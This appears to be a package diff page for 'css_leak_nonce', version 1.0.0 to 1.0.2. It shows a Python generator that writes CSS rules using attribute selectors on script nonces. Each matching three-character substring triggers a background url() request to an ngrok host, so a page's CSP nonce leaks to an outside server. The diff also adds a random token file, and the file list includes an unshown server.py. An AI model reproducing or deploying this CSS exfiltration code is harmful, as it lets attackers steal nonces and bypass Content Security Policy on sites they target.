css_leak_nonce 1.0.0 → 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/a.py +3 -3
- package/a.txt +1 -0
- package/package.json +1 -1
- package/rules.css +46657 -46657
- package/server.py +30 -0
package/a.py
CHANGED
|
@@ -8,10 +8,10 @@ strings = [''.join(perm) for perm in permutations]
|
|
|
8
8
|
rules = ""
|
|
9
9
|
trigger = "body{ background:"
|
|
10
10
|
for string in strings:
|
|
11
|
-
rules += f':has(script[nonce*="{string}"]){{--tosend-{string}: url(
|
|
12
|
-
trigger += f'var(--tosend-{string}, none)'
|
|
11
|
+
rules += f':has(script[nonce*="{string}"]){{--tosend-{string}: url(https://bf4d-42-112-181-236.ngrok-free.app/?x={string});}}\n'
|
|
12
|
+
trigger += f'var(--tosend-{string}, none),'
|
|
13
13
|
|
|
14
|
-
trigger += "}"
|
|
14
|
+
trigger += "var(--tosend-aaa, none)}"
|
|
15
15
|
with open("rules.css", "w+") as f:
|
|
16
16
|
|
|
17
17
|
f.write(rules + "\n" + trigger + "\n")
|
package/a.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
ws289c7zu9hewdjtfdnctsxxt4rdnwq6
|